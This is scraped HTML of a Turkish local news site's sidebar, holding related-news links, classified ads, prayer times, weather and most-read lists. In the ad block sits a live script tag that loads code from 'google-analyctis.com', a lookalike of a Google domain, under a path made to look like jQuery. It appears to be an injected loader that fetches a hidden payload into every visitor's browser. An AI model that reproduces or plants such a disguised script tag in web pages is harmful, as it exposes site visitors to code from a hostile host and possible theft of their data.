hakaret ve küfür içeren, aşağılayıcı, küçük düşürücü, kaba, pornografik, ahlaka aykırı, kişilik haklarına zarar verici ya da benzeri niteliklerde içeriklerden doğan her türlü mali, hukuki, cezai, idari sorumluluk içeriği gönderen Üye/Üyeler’e aittir. </div> </div> <!-- .tab-pane --> <div class="tab-pane yorumlar fbpanel" id="facebookpanel"> <div class="row-fluid"> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <div class="fb-comments" data-href="http://www.elbistaninsesi.com/guncel/ulku-ocaklari-baskani-kayadan-cevre-hassasiyeti-tesekkuru-h64970.html" data-width="603" data-colorscheme="light" data-numposts="10"></div> </div> <!-- #facebookpanel --> </div> </div> <!-- .tab-content --> </div> <!-- #yorumlar --> </section> </div> <!-- Sağ Blok --> <div id="sidebar" class="aside span4"> <!-- ILGILI HABERLER --> <div id="ilgiliHaberler-y"> <div class="ilgiliHaberler-y-t glyphicons show_big_thumbnails">İlgili Haberler</div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/bariyerlere-carpan-motosikletin-surucusu-hayatini-kaybetti-h64972.html" title="Bariyerlere çarpan motosikletin sürücüsü hayatını kaybetti"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/bariyerlere_carpan_motosikletin_surucusu_hayatini_kaybetti_h64972_ce48e.JPG" alt="Bariyerlere çarpan motosikletin sürücüsü hayatını kaybetti" /> <span>Bariyerlere çarpan motosikletin sürücüsü hayatını...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-engel-yok-sevgi-var-h64971.html" title="Başkan Gürbüz, “Engel yok sevgi var”"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/baskan_gurbuz_engel_yok_sevgi_var_h64971_657c6.jpg" alt="Başkan Gürbüz, “Engel yok sevgi var”" /> <span>Başkan Gürbüz, “Engel yok sevgi var”</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/polisten-tekerlekli-sandalye-hediyesi-h64969.html" title="Polisten tekerlekli sandalye hediyesi"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/polisten_tekerlekli_sandalye_hediyesi_h64969_82716.JPG" alt="Polisten tekerlekli sandalye hediyesi" /> <span>Polisten tekerlekli sandalye hediyesi</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/trafik-polisleri-kis-lastigi-denetimine-basladi-h64968.html" title="Trafik polisleri, kış lastiği denetimine başladı"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/trafik_polisleri_kis_lastigi_denetimine_basladi_h64968_e8607.JPG" alt="Trafik polisleri, kış lastiği denetimine başladı" /> <span>Trafik polisleri, kış lastiği denetimine başladı</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/heleteliler-halkgross-2-torenle-hizmete-acildi-h64967.html" title="Heleteliler Halkgross 2, törenle hizmete açıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/heleteliler_halkgross_2_torenle_hizmete_acildi_h64967_4551f.JPG" alt="Heleteliler Halkgross 2, törenle hizmete açıldı" /> <span>Heleteliler Halkgross 2, törenle hizmete açıldı</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/engellilere-yasal-haklari-anlatildi-ve-sorunlari-gorusuldu-h64966.html" title="Engellilere yasal hakları anlatıldı ve sorunları görüşüldü"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/engellilere_yasal_haklari_anlatildi_ve_sorunlari_gorusuldu_h64966_43e27.JPG" alt="Engellilere yasal hakları anlatıldı ve sorunları görüşüldü" /> <span>Engellilere yasal hakları anlatıldı ve sorunları...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogana-tesekkur-ettiler-h64965.html" title="Cumhurbaşkanı Erdoğan’a teşekkür ettiler"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/cumhurbaskani_erdogana_tesekkur_ettiler_h64965_1c166.JPG" alt="Cumhurbaşkanı Erdoğan’a teşekkür ettiler" /> <span>Cumhurbaşkanı Erdoğan’a teşekkür ettiler</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/baskan-arslandan-veto-degerlendirmesi-h64961.html" title="Başkan Arslan’dan ‘veto’ değerlendirmesi"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/baskan_arslandan_veto_degerlendirmesi_h64961_ff19e.JPG" alt="Başkan Arslan’dan ‘veto’ değerlendirmesi" /> <span>Başkan Arslan’dan ‘veto’ değerlendirmesi</span> </a> </div> </div> <div id="syazar"> <div class="header"> <h5><a style="margin-top:10px;" href="http://www.elbistaninsesi.com/seri-ilanlar/ilanver.html" class="this pull-left btn btn-small" title="İlan Ekle"><i class="halflings-icon plus"></i> İlan Ekle</a> <a style="margin-right:65px;font-size:140%;color:red;" href="http://www.elbistaninsesi.com/seri-ilanlar" title="Seri İlanlar">Seri İlanlar</a></h5> <a class="control left" href="#" id="syprev"></a> <a class="control right" href="#" id="synext"></a> </div> <div class="content"> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/yesilyurt-mhsahintepesi-hanezar-konaklarinda-sati-11972.html" title="YEŞİLYURT MH.ŞAHİNTEPESİ HANEZAR KONAKLARINDA SATI" >YEŞİLYURT MH.ŞAHİNTEPESİ HANEZAR KONAKLARINDA SATI</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/yesilyurt-mhsahintepesi-hanezar-konaklarinda-sati-11972.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/0ac99d2d6bd57468bed5c922485973a3657fd6d8.jpg" alt="YEŞİLYURT MH.ŞAHİNTEPESİ HANEZAR KONAKLARINDA SATI" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/elbistan-sanayii-sitesinde-satilik-150m2-satilik-i-11971.html" title="ELBİSTAN SANAYİİ SİTESİNDE SATILIK 150M2 SATILIK İ" >ELBİSTAN SANAYİİ SİTESİNDE SATILIK 150M2 SATILIK İ</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/elbistan-sanayii-sitesinde-satilik-150m2-satilik-i-11971.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/5c6542d5967d1c6c5295d315c19fc2566f8e1d5b.jpg" alt="ELBİSTAN SANAYİİ SİTESİNDE SATILIK 150M2 SATILIK İ" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kizilcaoba-mh-kisla-cduzun-kirac-mevkii-satilik-11970.html" title="KIZILCAOBA MH. KIŞLA CD.UZUN KIRAÇ MEVKİİ SATILIK" >KIZILCAOBA MH. KIŞLA CD.UZUN KIRAÇ MEVKİİ SATILIK</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kizilcaoba-mh-kisla-cduzun-kirac-mevkii-satilik-11970.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/f74b271829081acafa598e2707db08fdb2f0f420.jpg" alt="KIZILCAOBA MH. KIŞLA CD.UZUN KIRAÇ MEVKİİ SATILIK" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/orhangazi-mhcogulhan-yol-kavsagi-cv-satilik-teras-11968.html" title="ORHANGAZİ MH.ÇOGULHAN YOL KAVŞAGI CV SATILIK TERAS" >ORHANGAZİ MH.ÇOGULHAN YOL KAVŞAGI CV SATILIK TERAS</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/orhangazi-mhcogulhan-yol-kavsagi-cv-satilik-teras-11968.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/2beee5bcc8f3d922b88ae0a914d343efd72f8b7a.jpg" alt="ORHANGAZİ MH.ÇOGULHAN YOL KAVŞAGI CV SATILIK TERAS" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/yunus-emre-mhkentpark-civari-31-satilik-225m2lu-11967.html" title="YUNUS EMRE MH.KENTPARK CİVARI 3+1 SATILIK 225M2,LÜ" >YUNUS EMRE MH.KENTPARK CİVARI 3+1 SATILIK 225M2,LÜ</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/yunus-emre-mhkentpark-civari-31-satilik-225m2lu-11967.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/075968a982cfe013b18beea1ef63a0dd479e9df6.jpg" alt="YUNUS EMRE MH.KENTPARK CİVARI 3+1 SATILIK 225M2,LÜ" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/battalgazi-mhsekili-cd-satilik-31dogalgazli-sat-11966.html" title="BATTALGAZİ MH.SEKİLİ CD SATILIK 3+1,DOGALGAZLI SAT" >BATTALGAZİ MH.SEKİLİ CD SATILIK 3+1,DOGALGAZLI SAT</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/battalgazi-mhsekili-cd-satilik-31dogalgazli-sat-11966.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/6a04e6d51b3e08e30beef1c72584e10388c74fb8.jpg" alt="BATTALGAZİ MH.SEKİLİ CD SATILIK 3+1,DOGALGAZLI SAT" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/yesilyurt-mh10ncu-kat-41satilik-lux-daire-11964.html" title="YEŞİLYURT MH.10.NCU KAT 4+1,SATILIK LÜX DAİRE" >YEŞİLYURT MH.10.NCU KAT 4+1,SATILIK LÜX DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/yesilyurt-mh10ncu-kat-41satilik-lux-daire-11964.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/a8680ed7d94a4829a2ef7e583937500c26ad87d3.jpg" alt="YEŞİLYURT MH.10.NCU KAT 4+1,SATILIK LÜX DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kizilcaoba-mhkisla-cdsatilik-21-genis-125m2-sob-11962.html" title="KIZILCAOBA MH.KIŞLA CD.SATILIK 2+1 GENİŞ 125M2 SOB" >KIZILCAOBA MH.KIŞLA CD.SATILIK 2+1 GENİŞ 125M2 SOB</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kizilcaoba-mhkisla-cdsatilik-21-genis-125m2-sob-11962.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/08d3c59ea125ad17cf4343d7c942ad6be45d264a.jpg" alt="KIZILCAOBA MH.KIŞLA CD.SATILIK 2+1 GENİŞ 125M2 SOB" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/orhangazi-mh-gmkemal-okulu-civ-satili-daire-11961.html" title="ORHANGAZİ MH .G.M.KEMAL OKULU CİV. SATILI DAİRE" >ORHANGAZİ MH .G.M.KEMAL OKULU CİV. SATILI DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/orhangazi-mh-gmkemal-okulu-civ-satili-daire-11961.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/ebe3aa8b307b33398864796a35af01dbd3d9b1d3.jpg" alt="ORHANGAZİ MH .G.M.KEMAL OKULU CİV. SATILI DAİRE" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/yesilyurt-mh-pinarbasi-manzarali-satilik-imarli-11960.html" title="YEŞİLYURT MH. PINARBAŞI MANZARALI SATILIK İMARLI" >YEŞİLYURT MH. PINARBAŞI MANZARALI SATILIK İMARLI</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/yesilyurt-mh-pinarbasi-manzarali-satilik-imarli-11960.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/4e885cbaf7ce178b45d9efbc0bac649e52702ebf.jpg" alt="YEŞİLYURT MH. PINARBAŞI MANZARALI SATILIK İMARLI" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kunefe-pisirmeyi-bilen-eleman-araniyor-11959.html" title="Künefe pişirmeyi bilen eleman aranıyor" >Künefe pişirmeyi bilen eleman aranıyor</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kunefe-pisirmeyi-bilen-eleman-araniyor-11959.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Künefe pişirmeyi bilen eleman aranıyor" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-kaloroferli-daire-kisla-caddesi-11955.html" title="Satılık kaloröferli daire kışla caddesi" >Satılık kaloröferli daire kışla caddesi</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-kaloroferli-daire-kisla-caddesi-11955.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/02e4777ced42666a74f3ac4632b30f86c55fca15.jpg" alt="Satılık kaloröferli daire kışla caddesi" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/saraykentte-kiralik-daire-11954.html" title="Saraykentte Kiralık daire" >Saraykentte Kiralık daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/saraykentte-kiralik-daire-11954.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Saraykentte Kiralık daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/deneyimli-izgara-ustasi-alinacaktir-11951.html" title="Deneyimli ızgara ustası alınacaktır" >Deneyimli ızgara ustası alınacaktır</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/deneyimli-izgara-ustasi-alinacaktir-11951.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Deneyimli ızgara ustası alınacaktır" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/on-muhasebe-elemani-11946.html" title="Ön Muhasebe Elemani" >Ön Muhasebe Elemani</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/on-muhasebe-elemani-11946.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Ön Muhasebe Elemani" class="img-rounded" /></a> </div> </div> </div> </div> </div> <!-- SOSYAL --> <div class="sosyal"> <div class="row-fluid content"> <div class="span6 box facebook"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div> <div class="right"> <span class="count"><a href="http://facebook.com/elbistaninsesi" target="blank" id="likes"></a></span> <span class="text">Beğeni</span> </div> </div> <div class="bottom"> <a href="http://facebook.com/elbistaninsesi" target="blank" rel="nofollow">Facebook'ta Beğen</a> </div> </div> <div class="span6 box twitter"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div> <div class="right"> <span class="count"><a href="http://twitter.com/elbistaninsesi" target="blank" id="followers"></a></span> <span class="text">Takipçi</span> </div> </div> <div class="bottom"> <a href="http://twitter.com/elbistaninsesi" target="blank" rel="nofollow">Twitter'da Takip Et</a> </div> </div> </div> </div> <div id = "nobetci"> <a href="http://www.elbistaninsesi.com/images/dosyalarim/eczane.jpg" title="Nöbetçi Eczane" target="_blank"><img src = "http://www.ugurmumcu.info.tr/wp-content/uploads/2014/05/rb-eczane.png"></a> </div> <!-- NAMAZ VAKITLERI --> <div class="namazvakitleri"> <div class="title"> <h5>Namaz Vakitleri</h5> <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right"> <option value="adana" >Adana</option> <option value="adiyaman" >Adıyaman</option> <option value="afyon" >Afyon</option> <option value="agri" >Ağrı</option> <option value="aksaray" >Aksaray</option> <option value="amasya" >Amasya</option> <option value="ankara" >Ankara</option> <option value="antalya" >Antalya</option> <option value="ardahan" >Ardahan</option> <option value="artvin" >Artvin</option> <option value="aydin" >Aydın</option> <option value="balikesir" >Balıkesir</option> <option value="bartin" >Bartın</option> <option value="batman" >Batman</option> <option value="bayburt" >Bayburt</option> <option value="bilecik" >Bilecik</option> <option value="bingol" >Bingöl</option> <option value="bitlis" >Bitlis</option> <option value="bolu" >Bolu</option> <option value="burdur" >Burdur</option> <option value="bursa" >Bursa</option> <option value="canakkale" >Çanakkale</option> <option value="cankiri" >Çankırı</option> <option value="corum" >Çorum</option> <option value="denizli" >Denizli</option> <option value="diyarbakir" >Diyarbakır</option> <option value="duzce" >Düzce</option> <option value="edirne" >Edirne</option> <option value="elazig" >Elazığ</option> <option value="erzincan" >Erzincan</option> <option value="erzurum" >Erzurum</option> <option value="eskisehir" >Eskişehir</option> <option value="gaziantep" >Gaziantep</option> <option value="giresun" >Giresun</option> <option value="gumushane" >Gümüşhane</option> <option value="hakkari" >Hakkari</option> <option value="hatay" >Hatay</option> <option value="igdir" >Iğdır</option> <option value="isparta" >Isparta</option> <option value="istanbul" >İstanbul</option> <option value="izmir" >İzmir</option> <option value="kahramanmaras" selected>Kahramanmaraş</option> <option value="karabuk" >Karabük</option> <option value="karaman" >Karaman</option> <option value="kars" >Kars</option> <option value="kastamonu" >Kastamonu</option> <option value="kayseri" >Kayseri</option> <option value="kirikkale" >Kırıkkale</option> <option value="kirklareli" >Kırklareli</option> <option value="kirsehir" >Kırşehir</option> <option value="kilis" >Kilis</option> <option value="izmit" >Kocaeli</option> <option value="konya" >Konya</option> <option value="kutahya" >Kütahya</option> <option value="malatya" >Malatya</option> <option value="manisa" >Manisa</option> <option value="mardin" >Mardin</option> <option value="mersin" >Mersin</option> <option value="mugla" >Muğla</option> <option value="mus" >Muş</option> <option value="nevsehir" >Nevşehir</option> <option value="nigde" >Niğde</option> <option value="ordu" >Ordu</option> <option value="osmaniye" >Osmaniye</option> <option value="rize" >Rize</option> <option value="adapazari" >Sakarya</option> <option value="samsun" >Samsun</option> <option value="siirt" >Siirt</option> <option value="sinop" >Sinop</option> <option value="sivas" >Sivas</option> <option value="sanliurfa" >Şanlıurfa</option> <option value="sirnak" >Şırnak</option> <option value="tekirdag" >Tekirdağ</option> <option value="tokat" >Tokat</option> <option value="trabzon" >Trabzon</option> <option value="tunceli" >Tunceli</option> <option value="usak" >Uşak</option> <option value="van" >Van</option> <option value="yalova" >Yalova</option> <option value="yozgat" >Yozgat</option> <option value="zonguldak" >Zonguldak</option> </select> </div> <div class="content"> <div class="sonuc"> <table cellspacing="0" cellpadding="0" id="vakitler"> <tr> <th>İmsak</th> <th>Güneş</th> <th>Öğle</th> <th>İkindi</th> <th>Akşam</th> <th>Yatsı</th> </tr> <tr> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> </tr> </table> </div> </div> </div> <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe> <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div><a href="http://www.accuweather.com/tr/tr/elbistan/318373/current-weather/318373" class="aw-widget-legal"> <!-- By accessing and/or using this code snippet, you agree to AccuWeather’s terms and conditions (in English) which can be found at http://www.accuweather.com/en/free-weather-widgets/terms and AccuWeather’s Privacy Statement (in English) which can be found at http://www.accuweather.com/en/privacy. --> </a><div id="awtd1452737033699" class="aw-widget-36hour" data-locationkey="318373" data-unit="c" data-language="tr" data-useip="false" data-uid="awtd1452737033699" data-editlocation="false"></div><script type="text/javascript" src="http://oap.accuweather.com/launch.js"></script> <!-- ENCOKLAR --> <div class="encoklar"> <div class="accordion"> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne"> <span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5></a> </div> <div id="collapseOne" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/vefatlar/ugur-aksoy-26-yasinda-h64750.html" title="Uğur Aksoy 26 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/ugur_aksoy_26_yasinda_h64750_bd9a7.jpg" alt="Uğur Aksoy 26 yaşında" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/ugur-aksoy-26-yasinda-h64750.html" title="" ><span class="en-hit">1.</span> <strong>Uğur Aksoy 26 yaşında</strong> <span class="en-spot en-hidden">Uğur Aksoy 26 yaşında</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/nazli-tekerek-33-yasinda-h64792.html" title="Nazlı Tekerek 33 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/nazli_tekerek_33yasinda_h64792_a42dd.jpg" alt="Nazlı Tekerek 33 yaşında" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/nazli-tekerek-33-yasinda-h64792.html" title="" ><span class="en-hit">2.</span> <strong>Nazlı Tekerek 33 yaşında</strong> <span class="en-spot en-hidden">Nazlı Tekerek 33 yaşında</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/iskeleden-dusen-elbistanli-isci-yasamini-yitirdi-h64683.html" title="İskeleden düşen Elbistanlı işçi..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/iskeleden_dusen_elbistanli_isci_yasamini_yitirdi_h64683_cc378.jpg" alt="İskeleden düşen Elbistanlı işçi..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/iskeleden-dusen-elbistanli-isci-yasamini-yitirdi-h64683.html" title="" ><span class="en-hit">3.</span> <strong>İskeleden düşen Elbistanlı işçi...</strong> <span class="en-spot en-hidden">İstanbul’da çalıştığı inşaatın 3.katındaki iskeleden dengesini...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/devletin-zirvesi-unal-in-mutlu-gununde-bulustu-h64724.html" title="Devletin zirvesi, Ünal#039;ın mutlu..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/devletin_zirvesi_unal_in_mutlu_gununde_bulustu_h64724_c846d.jpg" alt="Devletin zirvesi, Ünal#039;ın mutlu..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/devletin-zirvesi-unal-in-mutlu-gununde-bulustu-h64724.html" title="" ><span class="en-hit">4.</span> <strong>Devletin zirvesi, Ünal&#039;ın mutlu...</strong> <span class="en-spot en-hidden">AK Parti Genel Başkan Yardımcısı Mahir Ünal&#039;ın kızı Elif...</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/guncel/7-saatlik-elektrik-kesintisi-yapilacak-h64786.html" title="7 saatlik elektrik kesintisi yapılacak" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/7_saatlik_elektrik_kesintisi_yapilacak_h64786_1f31f.jpg" alt="7 saatlik elektrik kesintisi yapılacak" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/7-saatlik-elektrik-kesintisi-yapilacak-h64786.html" title="" ><span class="en-hit">5.</span> <strong>7 saatlik elektrik kesintisi yapılacak</strong> <span class="en-spot en-hidden">AKEDAŞ Elbistan İşletme Müdürlüğü, KÖK yenileme çalışması...</span></a></div></li> </ul> </div> </div> </div> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo"> <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a> </div> <div id="collapseTwo" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/vefatlar/nazli-tekerek-33-yasinda-h64792.html" title="Nazlı Tekerek 33 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/nazli_tekerek_33yasinda_h64792_a42dd.jpg" alt="Nazlı Tekerek 33 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/nazli-tekerek-33-yasinda-h64792.html" title="" ><span class="en-hit">1.</span> <strong>Nazlı Tekerek 33 yaşında</strong> <span class="en-spot en-hidden">Nazlı Tekerek 33 yaşında</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/unal-mehmet-gurbuz-kaynarcaya-tekrardan-hayat-verdi-h64866.html" title="Ünal: Mehmet Gürbüz, Kaynarcaya..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/unal_mehmet_gurbuz_kaynarcaya_tekrardan_hayat_verdi_h64866_d07db.jpg" alt="Ünal: Mehmet Gürbüz, Kaynarcaya..."></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/unal-mehmet-gurbuz-kaynarcaya-tekrardan-hayat-verdi-h64866.html" title="" ><span class="en-hit">2.</span> <strong>Ünal: “Mehmet Gürbüz, Kaynarca’ya...</strong> <span class="en-spot en-hidden">AK Parti Genel Başkan Yardımcısı Mahir Ünal, Kaynarca bölgesindeki...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/gani-piskin-72-yasinda-h64693.html" title="Gani Pişkin 72 yaşında," class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/gani_piskin_72_yasinda_h64693_7699f.jpg" alt="Gani Pişkin 72 yaşında,"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/gani-piskin-72-yasinda-h64693.html" title="" ><span class="en-hit">3.</span> <strong>Gani Pişkin 72 yaşında,</strong> <span class="en-spot en-hidden">Gani Pişkin 72 yaşında,</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/ak-parti-kahramanmaras-milletvekilleri-ofisinden-santral-aciklamasi-h64857.html" title="AK Parti Kahramanmaraş Milletvekilleri..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/ak_parti_kahramanmaras_milletvekilleri_ofisinden_santral_aciklamasi_h64857_7bf56.jpeg" alt="AK Parti Kahramanmaraş Milletvekilleri..."></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/ak-parti-kahramanmaras-milletvekilleri-ofisinden-santral-aciklamasi-h64857.html" title="" ><span class="en-hit">4.</span> <strong>AK Parti Kahramanmaraş Milletvekilleri...</strong> <span class="en-spot en-hidden">AK Parti Kahramanmaraş Milletvekilleri Ofisinden, termik santrallere...</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/yasar-boran-70-yasinda-h64921.html" title="Yaşar Boran 70 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/yasar_boran_70_yasinda_h64921_a4eb4.jpg" alt="Yaşar Boran 70 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/yasar-boran-70-yasinda-h64921.html" title="" ><span class="en-hit">5.</span> <strong>Yaşar Boran 70 yaşında</strong> <span class="en-spot en-hidden"> Yaşar Boran 70yaşında</span></a></div></li> </ul> </div> </div> </div> </div> </div> <!-- SON YORUMLAR --> <div class="sayfalar"> <div class="header"> <h5>Son Yorumlar</h5> </div> <div class="content"> <ul class="unstyled"> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/baskan-arslandan-veto-degerlendirmesi-h64961.html#comment_277123" title="" >bu sürenin uzatılmasına oy veren vekkiler...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/mehmet-ozturk-86-yasinda-h64963.html#comment_277121" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/baskan-arslandan-veto-degerlendirmesi-h64961.html#comment_277120" title="" >Peki bu oylamaya CHP milletvekilleri kaç...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/baskan-arslandan-veto-degerlendirmesi-h64961.html#comment_277119" title="" >Başkan her açıklamanın sonuna 